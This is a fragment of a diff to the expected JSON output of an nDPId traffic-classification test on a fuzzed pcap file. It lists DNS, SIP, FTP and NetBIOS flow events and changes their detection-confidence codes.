00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473527,"flow_last_seen":1120470473527,"flow_idle_time":620000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":0,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470473527,"flow_last_seen":1120470473527,"flow_idle_time":620000,"flow_min_l4_payload_len":71,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":71,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470900860,"flow_last_seen":1120470904866,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899862,"flow_last_seen":1120470899862,"flow_idle_time":200000,"flow_min_l4_payload_len":1076,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":1076,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":17860,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
00604{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899862,"flow_last_seen":1120470899862,"flow_idle_time":200000,"flow_min_l4_payload_len":1076,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":1076,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":17860,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471087098,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120471088463,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":684,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120471088463,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"212.242.33.35"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471094410,"flow_last_seen":1120471094410,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471094410,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1120471094410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471094410,"pkt":"ADBUADRWAODtAW5TCABFAABEbGgAAIARSu3AqAECwKgBAQsPADUAMMF5YzYAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471094410,"flow_last_seen":1120471094410,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471094410,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471094410,"flow_last_seen":1120471094410,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471094410,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":2,"flow_last_seen":1120471094412,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120471094412,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Cw8AR6P1dTaAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471094412,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471094412,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00882{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470908872,"flow_last_seen":1120470908872,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"128.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470908872,"flow_last_seen":1120470908872,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471094413,"l3_proto":"ip4","src_ip":"128.168.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120471106433} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":690,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471094413,"pkt":"ADBUADRWAODtAW69CABFAABIbG4A3oARSuPAqAECwKgBAQsQJXMANDd+8jYBAFEBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1120471107427,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471107427,"pkt":"ADBUADRWAODtAW69CABFAABIbJIAAIARSuLAqAECwKgBAQsQADUANDd+8jYBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00826{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635042,"flow_last_seen":1120469635042,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.2.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00827{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635179,"flow_last_seen":1120469635179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.2","dst_ip":"147.234.1.253","src_port":2639,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} 
@@ -1359,18 +1359,18 @@ 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635128,"flow_last_seen":1120469635128,"flow_idle_time":7580000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.117.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635049,"flow_last_seen":1120469635049,"flow_idle_time":7580000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":1045,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635045,"flow_last_seen":1120469635045,"flow_idle_time":7580000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1120469540839,"flow_last_seen":1120471067960,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3442,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":200000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 